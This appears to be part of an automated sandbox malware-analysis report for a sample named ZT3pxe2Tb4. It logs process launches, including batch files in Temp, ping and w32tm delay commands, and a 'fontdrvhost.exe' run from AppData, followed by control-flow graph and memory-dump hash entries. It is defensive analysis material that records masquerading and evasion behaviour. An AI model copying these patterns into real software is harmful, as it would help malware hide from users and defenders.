                                                                  Start time:07:37:38
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:07:37:38
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:47
                                                                  Start time:07:37:40
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:48
                                                                  Start time:07:37:40
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:49
                                                                  Start time:07:37:41
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:50
                                                                  Start time:07:37:41
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:51
                                                                  Start time:07:37:48
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x7b0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:52
                                                                  Start time:07:37:50
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x80000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:54
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:55
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:56
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:57
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:58
                                                                  Start time:07:38:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0xb0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:59
                                                                  Start time:07:38:02
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:60
                                                                  Start time:07:38:02
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:5.6%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 26128 7ffd9bbd02f9 26129 7ffd9bbd0307 FindCloseChangeNotification 26128->26129 26131 7ffd9bbd03e4 26129->26131 26132 7ffd9bbd1f85 26133 7ffd9bbd1f9f GetFileAttributesW 26132->26133 26135 7ffd9bbd2065 26133->26135 26124 7ffd9bbceaad 26125 7ffd9bbceabb SuspendThread 26124->26125 26127 7ffd9bbceb94 26125->26127 26136 7ffd9bbd0190 26137 7ffd9bbd019a ResumeThread 26136->26137 26139 7ffd9bbd02a4 26137->26139

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b508982368c642eba7219bac35a4a6b2707dd408da351533068f4af504ad912
                                                                    • Instruction ID: 0c2909b1b9351cf4c2862ec59c4c835431c26d608a4f9efc6fcc317cd9cccb25
                                                                    • Opcode Fuzzy Hash: 1b508982368c642eba7219bac35a4a6b2707dd408da351533068f4af504ad912
                                                                    • Instruction Fuzzy Hash: 3352D530B0864A8FDBA8DB5CC865AB977F1FF55354F1401B9D04EC7292DB25AC86CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 986 7ffd9ba10da8-7ffd9ba10dbf 987 7ffd9ba10dc1 986->987 988 7ffd9ba10dc2-7ffd9ba10df9 986->988 987->988 990 7ffd9ba10e00-7ffd9ba10eb7 call 7ffd9ba107d0 988->990 991 7ffd9ba10dfb 988->991 1004 7ffd9ba10ecf-7ffd9ba10fa8 990->1004 1005 7ffd9ba10eb9-7ffd9ba10ece 990->1005 991->990 1018 7ffd9ba10fc0-7ffd9ba10fc1 1004->1018 1019 7ffd9ba10faa-7ffd9ba10fb0 1004->1019 1005->1004 1020 7ffd9ba10fb2 1018->1020 1021 7ffd9ba10fc3-7ffd9ba10fe3 1018->1021 1019->1020 1023 7ffd9ba10fbf 1020->1023 1024 7ffd9ba10fb4-7ffd9ba10fbe 1020->1024 1025 7ffd9ba10feb-7ffd9ba110dc 1021->1025 1023->1018 1024->1023
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: babceeee4b7a431c33a8d3800ee17318d55c02df3cdbb03e56458236d682ef66
                                                                    • Instruction ID: 98b2f5ef3adab451bc302d28e23194742963f959d2c21011d2e37c9c6ba83c28
                                                                    • Opcode Fuzzy Hash: babceeee4b7a431c33a8d3800ee17318d55c02df3cdbb03e56458236d682ef66
                                                                    • Instruction Fuzzy Hash: B2A1E175A0DA8D8FE7A4DB68C865BA97FE1FF55710F0401BAD049D72EACA792801CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
                                                                    • Opcode ID: 22350f7d061806a2cc0dd3210212b5e1ff18dbde5dfcc961335287d38e3abbf8
                                                                    • Instruction ID: b8f4c3c407a6d67f423d99870eb1bb2d3fc0ad67ddfee361f68374defe479e95
                                                                    • Opcode Fuzzy Hash: 22350f7d061806a2cc0dd3210212b5e1ff18dbde5dfcc961335287d38e3abbf8
                                                                    • Instruction Fuzzy Hash: 5C11DF32A2964E8FCB44EF2CE8915E9B7E0FF59325F0102BAF849D3250DB30A555CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 7ffd9bbd0190-7ffd9bbd01c9 10 7ffd9bbd01cb 8->10 11 7ffd9bbd01cc-7ffd9bbd02a2 ResumeThread 8->11 10->11 15 7ffd9bbd02aa-7ffd9bbd02f4 11->15 16 7ffd9bbd02a4 11->16 16->15
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 1107a0332a656e9b1be902e0ef182600c00819c1f6a23de7f88b2b0728e9d645
                                                                    • Instruction ID: e46685a645714861cad2a22ca7902d618a0e8b86405d730945b1ca1ccb76f252
                                                                    • Opcode Fuzzy Hash: 1107a0332a656e9b1be902e0ef182600c00819c1f6a23de7f88b2b0728e9d645
                                                                    • Instruction Fuzzy Hash: BA516D7090D78C8FDB55DFA8D894AE9BFF0EF56310F1441ABD049D7292CA359846CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: ee8bfb53012f9eec2673478652ccfe27bf280ebbaa0da9a6617dd30a4a0f4bd3
                                                                    • Instruction ID: ad2b8893f38e142afdff895d0f40a7e6830cd7b4c21b46846f1f51f6d6db5b3b
                                                                    • Opcode Fuzzy Hash: ee8bfb53012f9eec2673478652ccfe27bf280ebbaa0da9a6617dd30a4a0f4bd3
                                                                    • Instruction Fuzzy Hash: 6B417F70E0865C8FDB59DFA8C895BECBBF0FF5A310F1041AAD049D7292DA74A885CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 29 7ffd9bbceaad-7ffd9bbceab9 30 7ffd9bbceabb-7ffd9bbceac3 29->30 31 7ffd9bbceac4-7ffd9bbceb92 SuspendThread 29->31 30->31 35 7ffd9bbceb9a-7ffd9bbcebe4 31->35 36 7ffd9bbceb94 31->36 36->35
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    • Opcode ID: 4b33957d704c2c84afbc5b850e51fee2ae37fba60ef37078e4ac418fd46e6f8f
                                                                    • Instruction ID: af765283b512a785c962395346c2a7b8ff276e3cffc0a86cc61482aa5308ed19
                                                                    • Opcode Fuzzy Hash: 4b33957d704c2c84afbc5b850e51fee2ae37fba60ef37078e4ac418fd46e6f8f
                                                                    • Instruction Fuzzy Hash: 03416C30E0864C8FDB58EFA8D895AEDBBF0FB5A310F10416AD449E7292DA35A845CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 39 7ffd9bbd1f85-7ffd9bbd2063 GetFileAttributesW 43 7ffd9bbd206b-7ffd9bbd20a9 39->43 44 7ffd9bbd2065 39->44 44->43
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 510b72589b6c27fdf96c4fd1c3f0d87e810ef1ff2aee2e059473b0cbd5350027
                                                                    • Instruction ID: e34c0e231d20ab44060e79ac519cf49e4126aa01724b1bd98cba3fd9e8f3495f
                                                                    • Opcode Fuzzy Hash: 510b72589b6c27fdf96c4fd1c3f0d87e810ef1ff2aee2e059473b0cbd5350027
                                                                    • Instruction Fuzzy Hash: 44410870E08A4C8FDB98EF98D895BEDBBF0FB59310F14416AD009E7252DA75A885CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 18770c06ba62d7a343a05f1f48f72ab91c9c0e12eb358fd141804b5a3e4b3221
                                                                    • Instruction ID: 0d3e0523fbef00ff89fef5ba4eebc131c728917a43067b8bc62d03fc47f70008
                                                                    • Opcode Fuzzy Hash: 18770c06ba62d7a343a05f1f48f72ab91c9c0e12eb358fd141804b5a3e4b3221
                                                                    • Instruction Fuzzy Hash: D1515D71F0854A8FDB69DB98C4A06BDBBB1EF54340F1040BAD05EE72D6CB396945CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 82 7ffd9ba116d3-7ffd9ba2fad5 88 7ffd9ba2fad7 82->88 89 7ffd9ba2fadc-7ffd9ba2fae1 call 7ffd9ba116e0 82->89 88->89 91 7ffd9ba2fae6-7ffd9ba2faf1 89->91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -M_^
                                                                    • API String ID: 0-3132001028
                                                                    • Opcode ID: a73b366bd5c8370711c7ac80d5322fe483585b05b3cc735295b2bacbc9919b77
                                                                    • Instruction ID: 5a19e74d47f8a0811980f568f84a64283b7dbe8954ee85b32aecdb3b0e3a5d01
                                                                    • Opcode Fuzzy Hash: a73b366bd5c8370711c7ac80d5322fe483585b05b3cc735295b2bacbc9919b77
                                                                    • Instruction Fuzzy Hash: 1101A735B0E24E9FE711FF68A8A19ED7BA0EF01324F0902B6E45DC2096E9256618C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
309->287 310->287 311->320 321 7ffd9c0fd93b-7ffd9c0fd941 311->321 312->311 320->150 326 7ffd9c0fd943 321->326 327 7ffd9c0fd9ae-7ffd9c0fdacf 321->327 326->293 345 7ffd9c0fdad1-7ffd9c0fdad5 call 7ffd9c0f8ca0 327->345 347 7ffd9c0fdada 345->347 349 7ffd9c0fdadc-7ffd9c0fdaf3 347->349 350 7ffd9c0fdaf9-7ffd9c0fdafd 349->350 350->150 351 7ffd9c0fdaac-7ffd9c0fdac1 350->351
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 900fb79be5a8f306a3874711ea6809d3535141979650802b2c55c13aa327b842
                                                                    • Instruction ID: 2894dae66802a2252f237fb64074e24f7d04d4ac33116ed8135ab06595ee1e66
                                                                    • Opcode Fuzzy Hash: 900fb79be5a8f306a3874711ea6809d3535141979650802b2c55c13aa327b842
                                                                    • Instruction Fuzzy Hash: 5472EB22F0D3675BF712BBACE8F58E67BB0DF02368B0941B7D45D8A0D3D91A64858385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f65d66c0ee82578cbafa295aaa27359b66a04d7213c14710fe31d40b7fce189d
                                                                    • Instruction ID: 945c1428f50385fa2329be3808240ec1737eaf64a12b0041922612d566cc0f0c
                                                                    • Opcode Fuzzy Hash: f65d66c0ee82578cbafa295aaa27359b66a04d7213c14710fe31d40b7fce189d
                                                                    • Instruction Fuzzy Hash: 61D1CD30B0DA4B8FE3789B68D4A057577F1FF44348F94457EC48E83692DB29B8929B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eeb7ff646251dbbe698b2a7a50bb5f7a8d73f4d0f0939bac8a9134992ec0578f
                                                                    • Instruction ID: 2ec2572a4c3d5761fc0f74bac034c432b262ed8ccebb4bf2fd0d9a36fb3e4c1b
                                                                    • Opcode Fuzzy Hash: eeb7ff646251dbbe698b2a7a50bb5f7a8d73f4d0f0939bac8a9134992ec0578f
                                                                    • Instruction Fuzzy Hash: 02D19D707186568FEB59CF58C4E06B43BB1FF45350B5446BDC85E8B68ACB38E882DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cbf905a3ffbbe8cd381a999a736a3bae174a308076b2e35c4a9ab2b145c8fcc
                                                                    • Instruction ID: f8dd31ac04e731f6d2a03081868cd11bb819586240694c0397235db7f1ad2e73
                                                                    • Opcode Fuzzy Hash: 8cbf905a3ffbbe8cd381a999a736a3bae174a308076b2e35c4a9ab2b145c8fcc
                                                                    • Instruction Fuzzy Hash: D0C19C707186568BEB29CF58C4A05B53BB1FF45350B5485BDC89E8B6CACB38E881DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fcaf90b54a474fc8cb932b6ba1e938ca0e5cb63993af86bb458e61158ecd6ba
                                                                    • Instruction ID: a05082376b1cc6fa4209e0c79e0166f6873cd55bb5caea10d99333d565db6824
                                                                    • Opcode Fuzzy Hash: 1fcaf90b54a474fc8cb932b6ba1e938ca0e5cb63993af86bb458e61158ecd6ba
                                                                    • Instruction Fuzzy Hash: 5831A421F0C99B8FE775DB9485661F877F0EF06394F1802BAD05EC61C2CB796884A742
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51aefd47987c34ea647c123d374ee32c6ba4039d6e81525131c920771593074b
                                                                    • Instruction ID: 1b741ba83e9f89a8f54677db57d95a14824ad2909f0720a7159a3f282544a098
                                                                    • Opcode Fuzzy Hash: 51aefd47987c34ea647c123d374ee32c6ba4039d6e81525131c920771593074b
                                                                    • Instruction Fuzzy Hash: 6D410522F0C62781F3353BD8B0798F927A09F083E4F194576D86E861C7DE5E78C46282
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a7e39fa753219f0ec328ca194c50ccf6acd7c0e69fabc1d6ecceda3dc3d2e02
                                                                    • Instruction ID: 656b67ac0d6ae131b542669279f1259add09d8e47aa8319e2e458ba095f3c0dc
                                                                    • Opcode Fuzzy Hash: 1a7e39fa753219f0ec328ca194c50ccf6acd7c0e69fabc1d6ecceda3dc3d2e02
                                                                    • Instruction Fuzzy Hash: 6711C612F0D19786F77956E864390BC1EB06F597D0F1801BBD9AE821C2DE8C78C03382
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23a76457532c8045baf844adfb8a6a302fd867a69ab12bc1e5bf878b9403b408
                                                                    • Instruction ID: fa437b5fc75da67c73ed8e743ad0795bcf8146402033febc07497fa40701c8f3
                                                                    • Opcode Fuzzy Hash: 23a76457532c8045baf844adfb8a6a302fd867a69ab12bc1e5bf878b9403b408
                                                                    • Instruction Fuzzy Hash: 11813631B0CA434FE778AA58946507977F1EF95394F14057ED88EC7283CF28B8829791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a39205740200f36e181efa878772538e9b83ea538bdf6d64c30f2642717e93ec
                                                                    • Instruction ID: 96eef5ee4be1d32212ac85ed478a1cf4b8d9921427576817a638973fb15064ae
                                                                    • Opcode Fuzzy Hash: a39205740200f36e181efa878772538e9b83ea538bdf6d64c30f2642717e93ec
                                                                    • Instruction Fuzzy Hash: A2812231B0CA474FE3399A6894650BA77F0FF95394F14057ED88EC3182DF28BA829751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
